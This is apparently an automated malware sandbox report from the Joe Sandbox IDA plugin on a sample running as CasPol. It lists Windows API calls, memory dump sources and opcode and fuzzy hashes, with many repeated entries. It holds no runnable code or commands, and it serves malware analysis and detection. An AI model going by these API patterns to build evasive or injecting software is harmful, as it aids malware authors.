                                                                                                                        • Instruction Fuzzy Hash: 2841C2B1D1030DDFEB14CF99C884ADEBBB5BF48310F20812AE918AB250D774A945CF95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00000000,?,?,20AD7C03,00000100,00000000,?), ref: 20AD8171
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3660427363-0
                                                                                                                        • Opcode ID: 5a8ebc2d425352debba32b2ae521e831b66d25c02c9ae8986967bdaa45470bc6
                                                                                                                        • Instruction ID: 72ae56997f43d56d93d9b8cc6d81540a337f2d9fe8292f5b65dc0765510619ff
                                                                                                                        • Opcode Fuzzy Hash: 5a8ebc2d425352debba32b2ae521e831b66d25c02c9ae8986967bdaa45470bc6
                                                                                                                        • Instruction Fuzzy Hash: 994158B1D01258DFCB10CFE9C984A8EBBF5BF48700F55856AE918AB351D7709909CF91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 21293091
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714655100-0
                                                                                                                        • Opcode ID: ff1a082235c8bf5ed074fd5a6ef30630f4e8efa5cf248be36465bfcf7ace318f
                                                                                                                        • Instruction ID: 099d3aaf0c0d89301c7bbfd69a7baa737acc8f281000e8f20f8795932cf52d8a
                                                                                                                        • Opcode Fuzzy Hash: ff1a082235c8bf5ed074fd5a6ef30630f4e8efa5cf248be36465bfcf7ace318f
                                                                                                                        • Instruction Fuzzy Hash: A44126B4A002098FCB14CF99C889B9BBBF5FF89314F25845DE519AB321D775A940CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20AC625F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 3de20e4dc7cf2a287ddadbe99ac4a731cf480ba1e1ade0a458a2bd8cc544b82c
                                                                                                                        • Instruction ID: bafd61418a2a8c4353d0f35921bd9f89236c5921556071c0ff0d462d418b9c5d
                                                                                                                        • Opcode Fuzzy Hash: 3de20e4dc7cf2a287ddadbe99ac4a731cf480ba1e1ade0a458a2bd8cc544b82c
                                                                                                                        • Instruction Fuzzy Hash: 2621DFB5D01208AFDB10CFA9D884AEEBBF4FB48310F14841AE954A3350D378AA50CFA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(00000000,00000000), ref: 20ACB526
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 134000473-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20AC625F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(00000000,00000000), ref: 20ACB526
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 134000473-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindWindowW.USER32(00000000,00000000), ref: 20ACB526
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FindWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 134000473-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,20AC1282), ref: 20AC136F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1890195054-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 20ACEA1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,20AC1282), ref: 20AC136F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1890195054-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 20ACEA1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5763085504.0000000020AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AD0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ad0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,20ACE574), ref: 20ACE7AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5762969691.0000000020AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AC0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ac0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2538663250-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5765500911.0000000021290000.00000040.00000800.00020000.00000000.sdmp, Offset: 21290000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_21290000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2538663250-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'k
                                                                                                                        • API String ID: 0-2531104618
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: PHk
                                                                                                                        • API String ID: 0-517618362
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: PHk
                                                                                                                        • API String ID: 0-517618362
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 4'k
                                                                                                                        • API String ID: 0-2531104618
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1ad2a613aa5be2341392b7b50715a7ce280182e7aa5aae994271a51a08eca4db
                                                                                                                        • Instruction ID: 8d5f681a51eeb5f00ac43dd0b8c02ed129e2ce3d47e483d388194557d581a379
                                                                                                                        • Opcode Fuzzy Hash: 1ad2a613aa5be2341392b7b50715a7ce280182e7aa5aae994271a51a08eca4db
                                                                                                                        • Instruction Fuzzy Hash: D3427C30A10219CFDB24DFA8C488AADB7F2FB89314F948869D509DB751DB35EC86CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be077716deb008e97912933c61a14eb8fcd4b0edbd4b33d6591d888cc4cf8537
                                                                                                                        • Instruction ID: ef43ddc9d28bebb4c7b8879ae138296bbacd0663cef47046ffd4a4e1a4a5649e
                                                                                                                        • Opcode Fuzzy Hash: be077716deb008e97912933c61a14eb8fcd4b0edbd4b33d6591d888cc4cf8537
                                                                                                                        • Instruction Fuzzy Hash: 7AE1C234F102158FDB158BA8C4A477DBBB2EF89310F59802AFA46EB395CB759C01CB56
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f27df22fdeb4a2674d9a0e4d1ca7eba8236c391f8cf9d552376370a16b0bc52
                                                                                                                        • Instruction ID: e5d2766aab625dee9cc08794f89d7d0a87d42fb822b19129ff600914053b6349
                                                                                                                        • Opcode Fuzzy Hash: 2f27df22fdeb4a2674d9a0e4d1ca7eba8236c391f8cf9d552376370a16b0bc52
                                                                                                                        • Instruction Fuzzy Hash: 92F15176A10215CFCB05CF6CC4849AEBBF6FF89720B5A8455E515AB362CB30EC41CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c7c0cd3096ece75585f412f0aa92aeefc6c63bfaf21219db5999dbd0e22e83ec
                                                                                                                        • Instruction ID: b30014ac198452d7450db6db42af4cb84b6c2927806504d8ead31b805ee42102
                                                                                                                        • Opcode Fuzzy Hash: c7c0cd3096ece75585f412f0aa92aeefc6c63bfaf21219db5999dbd0e22e83ec
                                                                                                                        • Instruction Fuzzy Hash: ABE19D30A00618CFC714EBB8C5886ADB7F2FF89328B94C469D14A9B751EB729C56CF41
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3ef70d626f40a04325db4cd51e613c0264d605da82ddfa32f30b9b4cc10bba47
                                                                                                                        • Instruction ID: 9144fdd2404e9adcaa4b79fcebc736ff492836f4196d0b1d21d430850043c107
                                                                                                                        • Opcode Fuzzy Hash: 3ef70d626f40a04325db4cd51e613c0264d605da82ddfa32f30b9b4cc10bba47
                                                                                                                        • Instruction Fuzzy Hash: C9C14830B042168FDB159BB8C4902AFBBE2EF85314F554479DA09DB392EB35DC46CB92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b856d8c02a68a908f0f3836f5e6e80f13c9115f4798e68111181e3cc7a0d6103
                                                                                                                        • Instruction ID: 0eb935ee87f2f8d7849f2d5f63fab39d82ab6137f28836190fa0827893ffb3f3
                                                                                                                        • Opcode Fuzzy Hash: b856d8c02a68a908f0f3836f5e6e80f13c9115f4798e68111181e3cc7a0d6103
                                                                                                                        • Instruction Fuzzy Hash: F5C1CF34E102158FDB15CBA8C49477DBBB2EF89310F55802AEA46EB395CB31DC42CB96
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eb774ed5fd7636e4012920159f341fbe32e6e4995ff81fb2e8747bfeeccdbbe6
                                                                                                                        • Instruction ID: 07ef1947ffefe5d786790029c8956cd5d9e309e4a5f65d71dd97c0fad8f6810f
                                                                                                                        • Opcode Fuzzy Hash: eb774ed5fd7636e4012920159f341fbe32e6e4995ff81fb2e8747bfeeccdbbe6
                                                                                                                        • Instruction Fuzzy Hash: 02C1CE34F102158FDB158BA8C49477DBBB2EF89310F598029EA46EB395CB71DC42CB56
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 714f9faa36177d742953a4fe8f4e0d0f9e0e2b120e15549db9890b2cc0cb61f2
                                                                                                                        • Instruction ID: 7702f5b725b1476115aefb122482e6f14c05fa6414e6049aa1b7702bf64a2a97
                                                                                                                        • Opcode Fuzzy Hash: 714f9faa36177d742953a4fe8f4e0d0f9e0e2b120e15549db9890b2cc0cb61f2
                                                                                                                        • Instruction Fuzzy Hash: C5C1C230B042168FCB15DB78C4946AEB7F2AF89314F5684A9D50AEB341EF35DC46CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4d5ae695e76b149ed0f315d457c38d005ec9e6fc99bc013501d2949e26bf08cf
                                                                                                                        • Instruction ID: 6f16327afbaa1a3dd32175763eed33785eaaeea10d4017f7fd015ebe3d27ccef
                                                                                                                        • Opcode Fuzzy Hash: 4d5ae695e76b149ed0f315d457c38d005ec9e6fc99bc013501d2949e26bf08cf
                                                                                                                        • Instruction Fuzzy Hash: BE91E535A20116CFCB08CF6CC89496EBFB2FF89310B958169D606DB361D731E901CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a70565a6144cf8e7681909258692ce9e6198f6753da230b9bb13d5c82864de5a
                                                                                                                        • Instruction ID: 105cd344ec685f64396e5fd282b026bb25206db148ba576f4b887fc1551dce5a
                                                                                                                        • Opcode Fuzzy Hash: a70565a6144cf8e7681909258692ce9e6198f6753da230b9bb13d5c82864de5a
                                                                                                                        • Instruction Fuzzy Hash: 0BA1AC30A1A3998FCB01DFF4C8D459DBBB1BF56300B9988A6D905EB355EB349C0ACB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5724952253.0000000001390000.00000040.00000400.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1390000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5750009230.000000001D8AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8AD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1d8ad000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5750156942.000000001D8BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8BD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1d8bd000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5750156942.000000001D8BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8BD000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1d8bd000_CasPol.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8090c227191ba2480c4e9c9712cb2e3ed3f249120c1747044efcad6645aa75f5
                                                                                                                        • Instruction ID: 63943285e644eb7174be2d69e27f657331b5aae8be50369fd56493647e47e655
                                                                                                                        • Opcode Fuzzy Hash: 8090c227191ba2480c4e9c9712cb2e3ed3f249120c1747044efcad6645aa75f5
